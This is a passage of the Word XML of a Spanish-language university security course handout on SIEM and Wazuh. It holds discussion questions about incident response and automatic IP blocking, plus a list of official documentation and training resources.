              <w:t>El caso de Target muestra que tener detección no es suficiente si nadie responde. ¿Qué elementos de proceso y organización — más allá de la tecnología — son necesarios para que un SIEM sea efectivo? ¿Qué pasaría en una empresa sin equipo de seguridad dedicado que implementa Wazuh?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B3B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Wazuh puede configurarse para bloquear IPs automáticamente (Active Response) cuando detecta brute force SSH. Argumenta los pros y contras de activar esta funcionalidad en un entorno de producción. ¿En qué escenario específico podría causar más daño que beneficio?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6B3D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327DAD9D" w14:textId="77777777" w:rsidR="00683736" w:rsidRDefault="00683736">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B285948" w14:textId="77777777" w:rsidR="00683736" w:rsidRDefault="00683736">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BCAD8DD" w14:textId="77777777" w:rsidR="00683736" w:rsidRDefault="00683736">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9ADE6D" w14:textId="77777777" w:rsidR="00683736" w:rsidRPr="003C1812" w:rsidRDefault="00683736">
      <w:pPr>
        <w:spacing w:before="12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121D" w14:paraId="2F3C6B3F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2F3C6B3E" w14:textId="6DA1E225" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>RECURSOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6B47" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7FBFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6B40" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>[Docs] Wazuh — Documentación oficial completa — https://documentation.wazuh.com — gratuito</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B41" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>[Docs] Wazuh Rules Reference — reglas predefinidas y estructura — https://documentation.wazuh.com/current/user-manual/ruleset/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B42" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>[Docs] MITRE ATT&amp;CK Framework — https://attack.mitre.org — referencia completa de tácticas y técnicas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B43" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>[PDF] NIST SP 800-92 — Guide to Computer Security Log Management — https://csrc.nist.gov/publications/detail/sp/800-92/final — gratuito</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B44" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>[Video] Wazuh — Getting Started — https://www.youtube.com/@wazuhsecurity — canal oficial, ~15 min</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B45" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>[TryHackMe] Room: Wazuh — https://tryhackme.com/room/wazuhct — entorno del laboratorio en casa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B46" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>[TryHackMe] Room: SIEM — https://tryhackme.com/room/siem — conceptos de SIEM con ejercicios prácticos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6B48" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009E121D" w:rsidRPr="003C1812">
      <w:head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A68E8" w14:textId="77777777" w:rsidR="007A0397" w:rsidRDefault="007A0397" w:rsidP="003C1812">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60C5C0FF" w14:textId="77777777" w:rsidR="007A0397" w:rsidRDefault="007A0397" w:rsidP="003C18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49411" w14:textId="77777777" w:rsidR="007A0397" w:rsidRDefault="007A0397" w:rsidP="003C1812">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1F701D26" w14:textId="77777777" w:rsidR="007A0397" w:rsidRDefault="007A0397" w:rsidP="003C18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74142" w14:textId="2BBE43F3" w:rsidR="003C1812" w:rsidRPr="00411A99" w:rsidRDefault="003C1812" w:rsidP="003C1812">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:lang w:val="es-MX"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="005E4D8F">
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="es-MX"/>
      </w:rPr>
      <w:t>Arquitectura de Sistemas de Seguridad | CUGDL — UDG</w:t>
    </w:r>
    <w:r w:rsidRPr="005E4D8F">
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="es-MX"/>
      </w:rPr>
      <w:tab/>
      <w:t>U</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="es-MX"/>
      </w:rPr>
      <w:t xml:space="preserve">nidad </w:t>
    </w:r>
    <w:r w:rsidRPr="005E4D8F">
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="es-MX"/>
      </w:rPr>
      <w:t xml:space="preserve">2 · </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="es-MX"/>
      </w:rPr>
      <w:t>Sesión</w:t>
    </w:r>
    <w:r w:rsidRPr="005E4D8F">
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="es-MX"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="es-MX"/>
      </w:rPr>
      <w:t>7</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="4D21F6AA" w14:textId="77777777" w:rsidR="003C1812" w:rsidRPr="003C1812" w:rsidRDefault="003C1812">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:lang w:val="es-MX"/>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71F41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="751AF478"/>
    <w:lvl w:ilvl="0" w:tplc="57582522">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CBB2E644">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7FD2414A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2C00678E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="522A835E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="34F62698">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F11C800C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BA340666">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D696DA38">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A5C4388"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1B839F4"/>
    <w:lvl w:ilvl="0" w:tplc="91FACAAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="ACBC5492">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D0B65922">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BEE4CC52">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E97A8ED6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4E00BC78">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C1AA0BE8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2272F4AC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="008A0E06">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3BAC7452"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1305ACA"/>
    <w:lvl w:ilvl="0" w:tplc="689481A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A9F244E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2D22FB06">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A934C80A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A0348A94">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B3788632">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B7663962">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="CC243F02">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A5CC2DC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5F2E3210"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C52F89E"/>
    <w:lvl w:ilvl="0" w:tplc="51D0F496">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A824DCE0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0B703052">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1F7C4BDC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C0586764">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D922A7A0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="11925776">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C56079C4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B6740ED0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="325787138">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1504777434">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1768042141">
    <w:abstractNumId w:val="3"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="176776988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121D"/>
    <w:rsid w:val="00166617"/>
    <w:rsid w:val="003C1812"/>
    <w:rsid w:val="00683736"/>
    <w:rsid w:val="007A0397"/>
    <w:rsid w:val="008F63DC"/>
    <w:rsid w:val="009E121D"/>
    <w:rsid w:val="00BF47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C69A0"/>
  <w15:docId w15:val="{8B6CEE32-31B7-4C7F-9DB4-AB6FF993A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2E74B5"/>
      </w:pBdr>
      <w:spacing w:before="32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E74B5"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="180" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C55A11"/>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C1812"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003C1812"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C1812"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003C18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3256</Words>
  <Characters>18563</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>154</Lines>
  <Paragraphs>43</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>21776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Carlos Pulido Rosas</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-22T13:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-22T13:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>